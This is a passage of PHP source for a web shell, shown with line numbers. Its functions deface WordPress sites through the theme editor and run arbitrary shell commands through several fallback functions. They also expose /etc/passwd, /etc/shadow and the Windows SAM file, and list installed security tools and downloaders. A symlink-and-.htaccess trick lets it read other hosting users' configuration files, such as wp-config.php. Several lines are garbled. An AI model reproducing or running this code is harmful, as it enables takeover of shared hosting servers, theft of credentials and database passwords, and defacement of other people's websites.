629 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
630 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
631 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
632 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
633 $buffer = curl_exec($ch);
634 $pos = strpos($buffer, "action=logout");
635 $url2 = $site_url . '/wp-admin/theme-editor.php?file=index.php&theme=' . urlencode($template);
636 curl_setopt($ch, CURLOPT_URL, $url2);
637 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
638 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
639 curl_setopt($ch, CURLOPT_HEADER, 0);
640 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
641 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
642 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
643 $buffer0 = curl_exec($ch);
644 $_wpnonce = entre2v2($buffer0, '<input type="hidden" id="_wpnonce" name="_wpnonce" value="', '" />');
645 $_file = entre2v2($buffer0, '<input type="hidden" name="file" value="', '" />');
646 if (substr_count($_file, "index.php") != 0) $output.= "<tr align =center>";
647 $url2 = $site_url . "/wp-admin/theme-editor.php";
648 curl_setopt($ch, CURLOPT_URL, $url2);
649 curl_setopt($ch, CURLOPT_POST, 1);
650 curl_setopt($ch, CURLOPT_POSTFIELDS, "newcontent=" . $index . "&action=update&file=" . $_file . "&_wpnonce=" . $_wpnonce . "&submit=Update File");
651 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
652 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
653 curl_setopt($ch, CURLOPT_HEADER, 0);
654 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
655 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
656 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
657 $buffer = curl_exec($ch);
658 curl_close($ch);
659 $pos = strpos($buffer, '<div id="message" class="updated">');
660 $cond = 0;
661 if ($pos === false) $output.= "<td><a href=" . $site_url . ">Site : " . $site_url . "</a></td><td>Cannot Deface</td>";
662 else $output.= "<td><a href=" . $site_url . ">Site : " . $site_url . "</a></td><td><font class=txt>Wordpress Defaced Successfully</font></td>";
663 } else $output.= "<td colspan=2> DB Error</td>";
664 echo $output . "</tr>";
665 global $base_path;
666 unlink($base_path . 'COOKIE.txt');
667}
668function getDisabledFunctions() {
669 if (!ini_get('disable_functions')) {
670 return "None";
671 } else {
672 return @ini_get('disable_functions');
673 }
674}
675function getFilePermissions($file) {
676 $perms = fileperms($file);
677 if (($perms & 0xC000) == 0xC000) {
678 // Socket
679 $info = 's';
680 } elseif (($perms & 0xA000) == 0xA000) {
681 // Symbolic Link
682 $info = 'l';
683 } elseif (($perms & 0x8000) == 0x8000) {
684 // Regular
685 $info = '-';
686 } elseif (($perms & 0x6000) == 0x6000) {
687 // Block special
688 $info = 'b';
689 } elseif (($perms & 0x4000) == 0x4000) {
690 // Directory
691 $info = 'd';
692 } elseif (($perms & 0x2000) == 0x2000) {
693 // Character special
694 $info = 'c';
695 } elseif (($perms & 0x1000) == 0x1000) {
696 // FIFO pipe
697 $info = 'p';
698 } else {
699 // Unknown
700 $info = 'u';
701 }
702 // Owner
703 $info.= (($perms & 0x0100) ? 'r' : '-');
704 $info.= (($perms & 0x0080) ? 'w' : '-');
705 $info.= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
706 // Group
707 $info.= (($perms & 0x0020) ? 'r' : '-');
708 $info.= (($perms & 0x0010) ? 'w' : '-');
709 $info.= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
710 // World
711 $info.= (($perms & 0x0004) ? 'r' : '-');
712 $info.= (($perms & 0x0002) ? 'w' : '-');
713 $info.= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
714 return $info;
715}
716function filepermscolor($filename) {
717 if (!@is_readable($filename)) return "<font class=readperm>" . getFilePermissions($filename) . "</font>";
718 else if (!@is_writable($filename)) return "<font class=noperm>" . getFilePermissions($filename) . "</font>";
719 else return "<font class=wrtperm>" . getFilePermissions($filename) . "</font>";
720}
721function yourip() {
722 echo $_SERVER["REMOTE_ADDR"];
723}
724function phpver() {
725 $pv = @phpversion();
726 echo $pv;
727}
728function magic_quote() {
729 echo get_magic_quotes_gpc() ? "<font class=txt>ON</font>" : "OFF";
730}
731function serverip() {
732 echo @gethostbyname($_SERVER["HTTP_HOST"]);
733}
734function serverport() {
735 echo $_SERVER['SERVER_PORT'];
736}
737function safe() {
738 global $sm;
739 return $sm ? "ON :( :'( (Most of the Features will Not Work!)" : "OFF";
740}
741function serveradmin() {
742 echo $_SERVER['SERVER_ADMIN'];
743}
744function systeminfo() {
745 echo php_uname();
746}
747function curlinfo() {
748 echo function_exists('curl_version') ? ("<font class=txt>Enabled</font>") : ("Disabled");
749}
750function oracleinfo() {
751 echo function_exists('ocilogon') ? ("<font class=txt>Enabled</font>") : ("Disabled");
752}
753function mysqlinfo() {
754 echo function_exists('mysql_connect') ? ("<font class=txt>Enabled</font>") : ("Disabled");
755}
756function mssqlinfo() {
757 echo function_exists('mssql_connect') ? ("<font class=txt>Enabled</font>") : ("Disabled");
758}
759function postgresqlinfo() {
760 echo function_exists('pg_connect') ? ("<font class=txt>Enabled</font>") : ("Disabled");
761}
762function softwareinfo() {
763 echo getenv("SERVER_SOFTWARE");
764}
765function download() {
766 $frd = $_GET['download'];
767 $prd = explode("/", $frd);
768 for ($i = 0;$i < sizeof($prd);$i++) {
769 $nfd = $prd[$i];
770 }
771 @ob_clean();
772 header("Content-type: application/octet-stream");
773 header("Content-length: " . filesize($nfd));
774 header("Content-disposition: attachment; filename=\"" . $nfd . "\";");
775 readfile($nfd);
776 exit;
777}
778function HumanReadableFilesize($size) {
779 $mod = 1024;
780 $units = explode(' ', 'B KB MB GB TB PB');
781 for ($i = 0;$size > $mod;$i++) {
782 $size/= $mod;
783 }
784 return round($size, 2) . ' ' . $units[$i];
785}
786function showDrives() {
787 global $self;
788 foreach (range('A', 'Z') as $drive) {
789 if (is_dir($drive . ':\'))
790 {
791 $myd = addslashes($drive.":\");
792 ?>
793 <a href=javascript:void(0) onClick="changedir('dir',' < ? phpecho $myd; ?>')">
794 <?php echo $drive . ":\" ?>
795 </a>
796 <?php
797 }
798 }
799 }
800 function diskSpace()
801 {
802 global $dir;
803 return disk_total_space($dir);
804 }
805 function freeSpace()
806 {
807 global $dir;
808 return disk_free_space($dir);
809 }
810
811 function thiscmd($p)
812 {
813 $path = myexe('which ' . $p);
814 if(!empty($path))
815 return $path;
816 return false;
817 }
818
819 function split_dir()
820 {
821 $de=explode(" / ",getcwd());
822 $del=$de[0];
823 for($count=0;$count<sizeof($de);$count++)
824 {
825 $imp=$imp.$de[$count].'/';
826
827 echo " < ahref = ".$self." ? open = ".$imp." > ".$de[$count]." < / a > / ";
828 }
829
830 }
831
832 function mysecinfo()
833 {
834
835 function myparam($n, $v)
836 {
837 $v = trim($v);
838 if($v)
839 {
840 echo '<span>' . $n . ': </span>';
841 if(strpos($v, "") === false)
842 echo '<font class=txt>' . $v . '</font><br>';
843 else
844 echo '<pre class=ml1><font class=txt>' . $v . '</font></pre>';
845 }
846 }
847
848 myparam('Server software', @getenv('SERVER_SOFTWARE'));
849 if(function_exists('apache_get_modules'))
850 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
851 myparam('Open base dir', @ini_get('open_basedir'));
852 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
853 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
854 $temp=array();
855 if(function_exists('mysql_get_client_info'))
856 $temp[] = "MySql(".mysql_get_client_info().") ";
857 if(function_exists('mssql_connect'))
858 $temp[] = "MSSQL";
859 if(function_exists('pg_connect'))
860 $temp[] = "PostgreSQL";
861 if(function_exists('oci_connect'))
862 $temp[] = "Oracle";
863 myparam('Supported databases', implode(', ', $temp));
864 echo '<br>';
865
866 if($GLOBALS['os'] == 'Linux') {
867 myparam('Distro : ', myexe("cat / etc /*-release"));
868 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
869 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\")'>[view]</a>":'no');
870 myparam('OS version', @file_get_contents('/proc/version'));
871 myparam('Distr name', @file_get_contents('/etc/issue.net'));
872 myparam('Where is Perl?', myexe('whereis perl'));
873 myparam('Where is Python?', myexe('whereis python'));
874 myparam('Where is gcc?', myexe('whereis gcc'));
875 myparam('Where is apache?', myexe('whereis apache'));
876 myparam('CPU?', myexe('cat /proc/cpuinfo'));
877 myparam('RAM', myexe('free -m'));
878 myparam('Mount options', myexe('cat /etc/fstab'));
879 myparam('User Limits', myexe('ulimit -a'));
880
881
882 if(!$GLOBALS['safe_mode']) {
883 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
884 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
885 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
886 echo '<br>';
887 $temp=array();
888 foreach ($userful as $item)
889 if(thiscmd($item))
890 $temp[] = $item;
891 myparam('Userful', implode(', ',$temp));
892 $temp=array();
893 foreach ($danger as $item)
894 if(thiscmd($item))
895 $temp[] = $item;
896 myparam('Danger', implode(', ',$temp));
897 $temp=array();
898 foreach ($downloaders as $item)
899 if(thiscmd($item))
900 $temp[] = $item;
901 myparam('Downloaders', implode(', ',$temp));
902 echo '<br/>';
903 myparam('HDD space', myexe('df -h'));
904 myparam('Hosts', @file_get_contents('/etc/hosts'));
905
906 }
907 } else {
908 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
909 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc
910 etworks");
911 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
912 echo "Password File : <a href=".$_SERVER['PHP_SELF']."?download=" . $_SERVER["WINDIR"]."
913epair\sam><b><font class=txt>Download password file</font></b></a><br>";
914 echo "Config Files : <a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt>[ lmhosts ]</font></b></a><br>";
915 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
916 echo "Open Base Dir : <font class=txt>" . $base . "</font><br>";
917 myparam('OS Version',myexe('ver'));
918 myparam('Account Settings',myexe('net accounts'));
919 myparam('User Accounts',myexe('net user'));
920 }
921 echo '</div>';
922 }
923
924
925
926 function myexe($in) {
927 $out = '';
928 if (function_exists('exec')) {
929 @exec($in,$out);
930 $out = @join("
931 ",$out);
932 } elseif (function_exists('passthru')) {
933 ob_start();
934 @passthru($in);
935 $out = ob_get_clean();
936 } elseif (function_exists('system')) {
937 ob_start();
938 @system($in);
939 $out = ob_get_clean();
940 } elseif (function_exists('shell_exec')) {
941 $out = shell_exec($in);
942 } elseif (is_resource($f = @popen($in,"r"))) {
943 $out = "";
944 while(!@feof($f))
945 $out .= fread($f,1024);
946 pclose($f);
947 }
948 return $out;
949 }
950
951 function exec_all($command)
952 {
953
954 $output = '';
955 if(function_exists('exec'))
956 {
957 exec($command,$output);
958 $output = join("
959 ",$output);
960 }
961
962 else if(function_exists('shell_exec'))
963 {
964 $output = shell_exec($command);
965 }
966
967 else if(function_exists('popen'))
968 {
969 $handle = popen($command , "r"); // Open the command pipe for reading
970 if(is_resource($handle))
971 {
972 if(function_exists('fread') && function_exists('feof'))
973 {
974 while(!feof($handle))
975 {
976 $output .= fread($handle, 512);
977 }
978 }
979 else if(function_exists('fgets') && function_exists('feof'))
980 {
981 while(!feof($handle))
982 {
983 $output .= fgets($handle,512);
984 }
985 }
986 }
987 pclose($handle);
988 }
989
990
991 else if(function_exists('system'))
992 {
993 ob_start(); //start output buffering
994 system($command);
995 $output = ob_get_contents(); // Get the ouput
996 ob_end_clean(); // Stop output buffering
997 }
998
999 else if(function_exists('passthru'))
1000 {
1001 ob_start(); //start output buffering
1002 passthru($command);
1003 $output = ob_get_contents(); // Get the ouput
1004 ob_end_clean(); // Stop output buffering
1005 }
1006
1007 else if(function_exists('proc_open'))
1008 {
1009 $descriptorspec = array(
1010 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
1011 );
1012 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1013 if(is_resource($handle))
1014 {
1015 if(function_exists('fread') && function_exists('feof'))
1016 {
1017 while(!feof($pipes[1]))
1018 {
1019 $output .= fread($pipes[1], 512);
1020 }
1021 }
1022 else if(function_exists('fgets') && function_exists('feof'))
1023 {
1024 while(!feof($pipes[1]))
1025 {
1026 $output .= fgets($pipes[1],512);
1027 }
1028 }
1029 }
1030 pclose($handle);
1031 }
1032
1033 return(htmlspecialchars($output));
1034
1035 }
1036 function getOGid($value)
1037 {
1038 if(!function_exists('posix_getegid')) {
1039 $user = @get_current_user();
1040 $uid = @getmyuid();
1041 $gid = @getmygid();
1042 $group = "?";
1043 $owner = $uid . "/". $gid;
1044 return $owner;
1045 } else {
1046 $name=@posix_getpwuid(@fileowner($value));
1047 $group=@posix_getgrgid(@filegroup($value));
1048 $owner = $name['name']. " / ". $group['name'];
1049 return $owner;
1050 }
1051 }
1052 function mainfun($dir)
1053 {
1054 global $ind, $directorysperator,$os;
1055
1056 $mydir = basename(dirname(getcwd().$_SERVER['SCRIPT_NAME']));
1057 $pdir = str_replace($mydir,"",$dir);
1058 $pdir = str_replace("/","",$dir);
1059
1060 $files = array();
1061 $dirs = array();
1062
1063 $odir=opendir($dir);
1064 while($file = readdir($odir))
1065 {
1066 if(is_dir($dir.'/'.$file))
1067 {
1068 $dirs[]=$file;
1069 }
1070 else
1071 {
1072 $files[]=$file;
1073 }
1074 }
1075 $countfiles = count($dirs) + count($files);
1076 $dircount = count($dirs);
1077 $dircount = $dircount-2;
1078 $myfiles = array_merge($dirs,$files);
1079 $i = 0;
1080 if(is_dir($dir))
1081 {
1082 if(scandir($dir) === false)
1083 echo "<center><font size=3>Directory isn't readable</font></center>";
1084 else
1085 {
1086 ?><form method="post" id="myform" name="myform">
1087 <table id=maintable style="width:100%;" align="center" cellpadding="0">
1088 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
1089 <tr><td colspan="7" align="center"><font class="txt">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
1090 <tr class="file">
1091 <th>Name</th>
1092 <th>Size</th>
1093 <th>Permissions</th>
1094 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
1095 <th>Modification Date</th>
1096 <th>Rename</th>
1097 <th>Download</th>
1098 <th style="width:2%;">Action</th>
1099 </tr>
1100 <?php
1101 foreach($myfiles as $val)
1102 {
1103 $vv = addslashes($dir . $directorysperator . $val);
1104 $i++;
1105 if($val == ".")
1106 {
1107 $vv = addslashes($dir);
1108 ?><tr class="file"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')">[ . ]</a></td><td><font class="txt">CURDIR</font></td>
1109 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
1110 <?php if($os != 'Windows')
1111 {
1112 echo "<td align=center><font size=2>";
1113 echo getOGid($dir)."</font></td>";
1114 }
1115 ?>
1116 <td align="center"><font class="txt"><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1117 <td></td><td></td><td></td></</tr><?php
1118
1119 }
1120 else if($val=="..")
1121 {
1122 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1123 $vv = addslashes($val);
1124 if(empty($vv))
1125 $vv = "/"; ?>
1126 <tr class="file"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ .. ]</a></td><td><font class="txt">UPDIR</font></td>
1127
1128 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1129 <?php if($os != 'Windows')
1130 {
1131 echo "<td align=center><font size=2>";
1132 echo getOGid($val)."</font></td>";
1133 } ?>
1134 <td align="center"><font class="txt"><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
1135 <td></td><td></td><td></td></tr><?php
1136 }
1137 }
1138 foreach($myfiles as $val)
1139 {
1140 $vv = addslashes($dir . $directorysperator . $val);
1141 $i++;
1142 if(is_dir($vv))
1143 { if($val == "." || $val == "..")
1144 continue; ?>
1145 <tr class="file">
1146 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
1147 <td class='info'><font class="txt">DIR</font></td>
1148 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1149 <?php if($os != 'Windows')
1150 {
1151 echo "<td align=center><font size=2>";
1152 echo getOGid($val)."</font></td>";
1153 } ?>
1154 <td align="center"><font class="txt"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1155 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')">Rename</a></td>
1156 <td></td>
1157 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1158 </tr></font>
1159 <?php
1160 }
1161 else if(is_file($vv))
1162 {
1163 ?>
1164 <tr class="file">
1165 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
1166 <td class='info'><font class="txt"><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
1167
1168 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1169 <?php if($os != 'Windows')
1170 {
1171 echo "<td align=center><font size=2>";
1172 echo getOGid($val)."</font></td>";
1173 } ?>
1174 <td align="center"><font class="txt"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1175 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')">Rename</a></td>
1176 <td class="info" align=center><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>">Download</a>
1177 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1178 </tr>
1179 <p>
1180 <?php
1181 }
1182 }
1183 echo "</table>
1184 <div id=maindiv align='right' style='width:97%;'><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt>Check All </font></label>
1185
1186 <select class=sbox name=choice style='width: 100px;'>
1187 <option value=delete>Delete</option>
1188 <option value=chmod>Change mode</option>
1189
1190 if(class_exists('ZipArchive'))
1191 { <option value=compre>Compress</option>
1192 <option value=uncompre>Uncompress</option> }
1193 </select>
1194
1195
1196 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
1197 }}
1198 else
1199 {
1200 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
1201 }
1202
1203
1204 }
1205
1206 if(isset($_REQUEST["script"]))
1207 {
1208 ?>
1209 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('scserver')"><font class=txt size="4">| Use Server |</font></a></td>
1210 <td><a href=javascript:void(0) onClick="getdata('scphp')"><font class=txt size="4">| Use PHP |</font></a></td>
1211 </tr></table></center>
1212 <?php
1213 }
1214 elseif(isset($_REQUEST["scserver"]))
1215 {
1216 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('servermanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1217 <td><a href=javascript:void(0) onClick="getdata('serverscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1218 </tr></table></center><?php
1219 }
1220 else if(isset($_REQUEST['servermanuallyscript']))
1221 {
1222 ?>
1223 <center>
1224 <form action="<?php echo $self; ?>" method="post">
1225 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1226 <input type="button" OnClick="manuallyscriptfn('serverscriptlocator',passwd.value)" value="Get Config" class="but">
1227 </form>
1228 </center>
1229 <?php
1230 }
1231 elseif(isset($_REQUEST['serverscriptlocator']))
1232 {
1233 if($os != "Windows")
1234 {
1235 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1236 $path=explode('/',$url);
1237 $url =str_replace($path[count($path)-1],'',$url);
1238 if(isset($_REQUEST['passwd']))
1239 {
1240 $getetc = trim($_REQUEST['passwd']);
1241
1242 mkdir("dhanushSPT");
1243 chdir("dhanushSPT");
1244
1245 $myfile = fopen("test.txt","w");
1246 fputs($myfile,$getetc);
1247 fclose($myfile);
1248 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Username</font></td><td align=center><font size=4 >Script</font></td></tr>";
1249 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1250 while(!feof($file))
1251 {
1252 $s = fgets($file);
1253 $matches = array();
1254 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1255 $matches = str_replace("home/","",$matches[1]);
1256 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
1257 $headers=get_headers($hs_status);
1258 if(strpos($headers[0],'200') == true )
1259 $hs_script = "Wordpress";
1260 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
1261 $headers=get_headers($hs_status);
1262 if(strpos($headers[0],'200') == true )
1263 $hs_script = "Wordpress";
1264 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
1265 $headers=get_headers($hs_status);
1266 if(strpos($headers[0],'200') == true )
1267 $hs_script = "Joomla";
1268 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
1269 $headers=get_headers($hs_status);
1270 if(strpos($headers[0],'200') == true )
1271 $hs_script = "Vbulletin";
1272 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
1273 $headers=get_headers($hs_status);
1274 if(strpos($headers[0],'200') == true )
1275 $hs_script = "Vbulletin";
1276 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
1277 $headers=get_headers($hs_status);
1278 if(strpos($headers[0],'200') == true )
1279 $hs_script = "Mybb";
1280 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
1281 $headers=get_headers($hs_status);
1282 if(strpos($headers[0],'200') == true )
1283 $hs_script = "IPB";
1284 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
1285 $headers=get_headers($hs_status);
1286 if(strpos($headers[0],'200') == true )
1287 $hs_script = "SMF";
1288 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
1289 $headers=get_headers($hs_status);
1290 if(strpos($headers[0],'200') == true )
1291 $hs_script = "WHMCS";
1292 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
1293 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
1294 $dcount++;
1295 }
1296 echo "</table>";
1297 fclose($file);
1298 unlink("test.txt");
1299 }
1300 else
1301 {
1302 $d0mains = @file("/etc/named.conf");
1303 if($d0mains)
1304 {
1305 @mkdir("dhanush",0777);
1306 @chdir("dhanush");
1307 execmd("ln -s / root");
1308 $file3 = 'Options all
1309 DirectoryIndex Sux.html
1310 AddType text/plain .php
1311 AddHandler server-parsed .php
1312 AddType text/plain .html
1313 AddHandler txt .html
1314 Require None
1315 Satisfy Any
1316 ';
1317 $fp3 = fopen('.htaccess','w');
1318 $fw3 = fwrite($fp3,$file3);
1319 @fclose($fp3);
1320 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Site</font></td><td align=center><font size=4 >Script</font></td></tr>";
1321 $dcount = 1;
1322 foreach($d0mains as $d0main)
1323 {
1324 if(eregi("zone",$d0main))
1325 {
1326 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1327 flush();
1328
1329 if(strlen(trim($domains[1][0])) > 2)
1330 {
1331 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1332 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/wp-config.php";
1333 $headers=get_headers($hs_status);
1334 if(strpos($headers[0],'200') == true )
1335 $hs_script = "Wordpress";
1336 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/blog/wp-config.php";
1337 $headers=get_headers($hs_status);
1338 if(strpos($headers[0],'200') == true )
1339 $hs_script = "Wordpress";
1340 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/configuration.php";
1341 $headers=get_headers($hs_status);
1342 if(strpos($headers[0],'200') == true )
1343 $hs_script = "Joomla";
1344 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/forum/includes/config.php";
1345 $headers=get_headers($hs_status);
1346 if(strpos($headers[0],'200') == true )
1347 $hs_script = "Vbulletin";
1348 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/core/includes/config.php";
1349 $headers=get_headers($hs_status);
1350 if(strpos($headers[0],'200') == true )
1351 $hs_script = "Vbulletin";
1352 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/inc/config.php";
1353 $headers=get_headers($hs_status);
1354 if(strpos($headers[0],'200') == true )
1355 $hs_script = "Mybb";
1356 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/conf_global.php";
1357 $headers=get_headers($hs_status);
1358 if(strpos($headers[0],'200') == true )
1359 $hs_script = "IPB";
1360 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/settings.php";
1361 $headers=get_headers($hs_status);
1362 if(strpos($headers[0],'200') == true )
1363 $hs_script = "SMF";
1364 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/submitticket.php";
1365 $headers=get_headers($hs_status);
1366 if(strpos($headers[0],'200') == true )
1367 $hs_script = "WHMCS";
1368 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td><a href=".$domains[1][0]." target='_blank'><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt><a href=".$hs_status." target=_blank>".$hs_user."</a></font></td></tr>"; flush();
1369
1370 $dcount++;
1371 }
1372 }
1373
1374 }
1375 echo "</table>";
1376 }
1377 else
1378 {
1379 $TEST=@file('/etc/passwd');
1380 if ($TEST)
1381 {
1382 @mkdir("dhanush",0777);
1383 @chdir("dhanush");
1384 execmd("ln -s / root");
1385 $file3 = 'Options all
1386 DirectoryIndex Sux.html
1387 AddType text/plain .php
1388 AddHandler server-parsed .php
1389 AddType text/plain .html
1390 AddHandler txt .html
1391 Require None
1392 Satisfy Any
1393 ';
1394 $fp3 = fopen('.htaccess','w');
1395 $fw3 = fwrite($fp3,$file3);
1396 @fclose($fp3);
1397
1398 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
1399
1400 $dcount = 1;
1401 $file = fopen("/etc/passwd", "r");
1402 //Output a line of the file until the end is reached
1403 while(!feof($file))
1404 {
1405 $s = fgets($file);
1406 $matches = array();
1407 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1408 $matches = str_replace("home/","",$matches[1]);
1409 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
1410 $headers=get_headers($hs_status);
1411 if(strpos($headers[0],'200') == true )
1412 $hs_script = "Wordpress";
1413 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
1414 $headers=get_headers($hs_status);
1415 if(strpos($headers[0],'200') == true )
1416 $hs_script = "Wordpress";
1417 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
1418 $headers=get_headers($hs_status);
1419 if(strpos($headers[0],'200') == true )
1420 $hs_script = "Joomla";
1421 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
1422 $headers=get_headers($hs_status);
1423 if(strpos($headers[0],'200') == true )
1424 $hs_script = "Vbulletin";
1425 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
1426 $headers=get_headers($hs_status);
1427 if(strpos($headers[0],'200') == true )
1428 $hs_script = "Vbulletin";
